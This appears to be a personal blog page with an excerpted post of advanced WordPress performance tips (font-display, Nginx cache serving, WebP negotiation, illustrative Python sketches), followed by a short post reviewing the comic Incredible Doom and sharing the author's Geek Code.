Fonts are lovely and can be an important part of your brand identity, but they can also add a lot of weight to your web pages.

If you’re not ready and able to drop your webfonts and appreciate the beauty and flexibility of a system font stack (I get it: I’m not there quite yet!), you can at least make smarter use of your fonts:

Use the most permissive font-display: CSS directive that you can tolerate! Avoid font-display: block, which is functionally the default in most browsers, unless you absolutely have to.

font-display: fallback is good if you’re too cowardly/think your font is too important for you to try font-display: optional.

font-display: optional is an excellent choice for body text: if the browser thinks it’s worthwhile to download the font (it might choose not to if the operating system indicates that it’s using a metered or low-bandwidth connection, for example), it’ll try to download it, but it won’t let doing so slow things down too much and it’ll fall-back to whatever backup (system) font you specify.

font-display: swap is also worth considering: this will render any text immediately, even if the right font hasn’t downloaded yet, with no blocking time whatsoever, and then swap it for the right font when it appears. It’s probably better for headings, because large paragraphs of text can be a little disorienting if they change font while a user is looking at them!

It’s possible that by this point you’re saying “if I had to do this much work, I might as well just use a static site generator”. Well good news: that’s what you’re about to do!

Obviously you should make sure all your regular caching improvements (appropriate HTTP headers for caching, a service worker that further improves on that logic based on your content’s update schedule, etc.) are in place first. Again: everything in this guide presupposes that you’ve already done the things that normal people do.

By aggressively caching pre-compressed copies of all your pages, you’re effectively getting the best of both worlds: a website that, for anonymous visitors, is served directly from .html.gz files on a hard disk or even straight from RAM in memcached10, but which still maintains all the necessary server-side interactivity to allow it to be used as a conventional Web-based CMS (including accepting comments if that’s your jam).

WP Super Cache can do the heavy lifting for you for a filesystem-based solution so long as you put it into “Expert” mode and amend your webserver configuration. I’m using Nginx, so I needed a try_files directive like this:

location / {
  try_files /wp-content/cache/supercache/$http_host/$wp_super_cache_path/index-https.html $uri $uri/ /index.php?$args;
}
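If try_files is new to you, the idea is that the server checks each candidate path in turn and serves the first one that exists on disk, only falling through to the final argument (here, WordPress's index.php) when none do. Here's a rough Python sketch of that lookup order. It's a simplified model rather than how Nginx is actually implemented, and the function name, hostname and paths are made up for the example:

```python
import tempfile
from pathlib import Path
from typing import Sequence


def resolve_try_files(doc_root: Path, candidates: Sequence[str], fallback: str) -> str:
    """Return the first candidate that exists under doc_root, else the fallback.

    Simplified model: a candidate ending in "/" must be an existing directory;
    any other candidate must be an existing regular file.
    """
    for candidate in candidates:
        target = doc_root / candidate.lstrip("/")
        if candidate.endswith("/"):
            if target.is_dir():
                return candidate
        elif target.is_file():
            return candidate
    return fallback


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        # Hypothetical cache path for a request to https://example.com/hello/
        cached = "/wp-content/cache/supercache/example.com/hello/index-https.html"
        order = [cached, "/hello/", "/hello/"]

        # Nothing cached yet, so the request falls through to PHP.
        print(resolve_try_files(root, order, "/index.php"))

        # Once a cached copy exists, it wins without touching PHP.
        (root / cached.lstrip("/")).parent.mkdir(parents=True)
        (root / cached.lstrip("/")).write_text("<p>cached</p>")
        print(resolve_try_files(root, order, "/index.php"))
```

The ordering is the whole point: putting the cached file first means that anonymous visitors never wake up PHP at all when a cached copy exists.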

I’m sure your favourite performance testing tool has already complained at you about your failure to use the best formats possible when serving images to your users. But how can you fix it?

There are some great plugins for improving your images automatically and/or in bulk – I use EWWW Image Optimizer – but to really make the most of them you’ll want to reconfigure your webserver to detect clients that Accept: image/webp and attempt to dynamically serve them .webp variants, for example. Or if you’re ready to give up on legacy formats and replace all your .pngs with .webps, that’s probably fine too!

https://danq.me/_q23u/2023/11/dynamic.png is probably an image/webp. But if your browser doesn’t support WebP, you’ll get an image/png instead!

Assuming you’ve got curl and ImageMagick’s identify, you can see this in action:

curl -s https://danq.me/_q23u/2023/11/dynamic.png -H "Accept: image/webp" | identify -

curl -s https://danq.me/_q23u/2023/11/dynamic.png -H "Accept: image/png" | identify -
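The decision the server is making there can be sketched in a few lines of Python. This isn't my actual webserver configuration, just an illustration of the logic, and the function names are invented for the example. It assumes the server only cares about an explicit image/webp entry in the Accept header and deliberately ignores wildcards like image/* or */*:

```python
def accepts_webp(accept_header: str) -> bool:
    """True if the Accept header lists image/webp with a non-zero quality."""
    for item in accept_header.split(","):
        media_type, *params = [part.strip() for part in item.split(";")]
        if media_type.lower() != "image/webp":
            continue
        quality = 1.0  # a missing q parameter means full preference
        for param in params:
            name, _, value = param.partition("=")
            if name.strip().lower() == "q":
                try:
                    quality = float(value)
                except ValueError:
                    quality = 0.0  # treat a malformed q as "not acceptable"
        return quality > 0
    return False


def choose_variant(accept_header: str, webp_available: bool) -> str:
    """Pick the Content-Type to serve for a URL that nominally ends in .png."""
    if webp_available and accepts_webp(accept_header):
        return "image/webp"
    return "image/png"


if __name__ == "__main__":
    print(choose_variant("image/webp", webp_available=True))
    print(choose_variant("image/png", webp_available=True))
```

If you do something like this, it's worth sending a Vary: Accept response header too, so that any cache sitting between you and your visitors doesn't hand a WebP to a client that never asked for one.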

The single biggest impact you can have upon the performance of your WordPress pages is to make them less complex.

I’m not necessarily saying that everybody should follow in my lead and co-publish their WordPress sites on the Gemini protocol. But you’ve got to admit: the simplicity of the Gemini protocol and the associated Gemtext format makes both lightning fast.

Writing my templates and posts so that they’re compatible with CapsulePress helps keep my code necessarily-simple. You don’t have to do that, but you should be asking yourself:

Could you add a <dialog> directly to the markup in the anticipation that it might be triggered later using JavaScript, rather than having that JavaScript document.createElement the element after the page becomes readable?

A service worker isn’t magic. In particular, it can’t help you with those new visitors hitting your site for the first time12.

But a suitable service worker can do a few things that can help with performance. In particular, you might consider:

Chapters 7 and 8 of Going Offline by Jeremy Keith are especially good for explaining how this can be achieved, and it’s all much easier than everything else I just described.

Did I miss anything? If you’ve got a tip about ramping up WordPress performance that isn’t one of the “typical seven” – probably because it’s too hard to be worthwhile for most people – I’d love to hear it!

1 You’ll sometimes see guides that suggest that using a CDN is to be recommended specifically because it splits your assets among multiple domains/subdomains, which mitigates browsers’ limitation on the number of files they can download simultaneously. This is terrible advice, because such limitations essentially don’t exist any more, but DNS lookups and TLS handshakes still have a bandwidth and computational cost. There are good things about CDNs, sometimes, but this has not been one of them for some time now.

2 I’m not sure why guides keep stressing the importance of minifying code, because by the time you’re compressing it too it’s almost pointless. I guess it’s helpful if your compression fails?

3 “Use a faster server” is a “just throw money/the environment at it” solution. I’d like to think we can do better.

4 For my personal blog, I choose to prioritise user experience, privacy, accessibility, resilience, and standards compliance above almost everything else.

5 If you prefer to keep your backstab code separate, you can put it in a custom plugin, but you might find that you have to name it something late in the alphabet – I’ve previously used names like zzz-danq-anti-plugin-hacks – to ensure that they load after the plugins whose functionality you intend to unhook: broadly-speaking, WordPress loads plugins in alphabetical order.

6 I’ve assumed you’re using a classic, not block, theme. If you’re using a block theme, you get a whole different set of performance challenges to think about. Don’t get me wrong: I love block themes and think they’re a great way to put more people in control of their site’s design! But if you’re at the point where you’re comfortable digging this deep into your site’s PHP code, you probably don’t need that feature anyway, right?

7 WordPress is really good at serving functionally-duplicate content, so search engines appreciate it if you declare a proper canonical URL.

8 Before you choose to block all third-party JavaScript, you might have to whitelist Google Analytics if you’re the kind of person who doesn’t mind selling their visitor data to the world’s biggest harvester of personal information in exchange for some pretty graphs. I’m not that kind of person.

9 You were looking to join me in 512kb club anyway, right?

10 I’ve experimented with mounting a ramdisk and storing the WP Super Cache directory there, but it didn’t make a huge difference, probably because my files are so small that the parse/render time on the browser side dominates the total cascade, and they’re already being served from an SSD. I imagine in my case memcached would provide similarly-small benefits.

11 I really love the power of CSS preprocessors like Sass, but they do make it deceptively easy to create many more – and longer – selectors than you intended in your final compiled stylesheet.

12 Tools like Lighthouse usually simulate first-time visitors, which can be a little unfair to sites with great performance for established visitors. But everybody is a first-time visitor at least once (and probably more times, as caches expire or are cleared), so they’re still a metric you should consider.





I just finished reading Incredible Doom volumes 1 and 2, by Matthew Bogart and Jesse Holden, and man… that was a heartwarming and nostalgic tale!

Set in the early-to-mid-1990s world in which the BBS is still alive and kicking, and the Internet’s gaining traction but still lacks the “killer app” that will someday be the Web (which is still new and not widely-available), the story follows a handful of teenagers trying to find their place in the world. Meeting one another in the 90s explosion of cyberspace, they find online communities that provide connections that they’re unable to make out in meatspace.

It touches on experiences of 90s cyberspace that, for many of us, were very definitely real. And while my online “scene” at around the time that the story is set might have been different from that of the protagonists, there’s enough of an overlap that it felt startlingly real and believable. The online world in which I – like the characters in the story – hung out… but which occupied a strange limbo-space: both anonymous and separate from the real world but also interpersonal and authentic; a frontier in which we were still working out the rules but within which we still found common bonds and ideals.

Anyway, this is all a long-winded way of saying that Incredible Doom is a lot of fun and if it sounds like your cup of tea, you should read it.



Also: shortly after putting the second volume down, I ended up updating my Geek Code for the first time in… ooh, well over a decade. The standards have moved on a little (not entirely in a good way, I feel; also they’ve diverged somewhat), but here’s my attempt:

----- BEGIN GEEK CODE VERSION 6.0 ----- GCS^$/SS^/FS^>AT A++ B+:+:_:+:_ C-(--) D:+ CM+++ MW+++>++ ULD++ MC+ LRu+>++/js+/php+/sql+/bash/go/j/P/py-/!vb PGP++ G:Dan-Q E H+ PS++ PE++ TBG/FF+/RM+ RPG++ BK+>++ K!D/X+ R@ he/him! ----- END GEEK CODE VERSION 6.0 -----

1 I was amazed to discover that I could still remember most of my Geek Code syntax and only had to look up a few components to refresh my memory.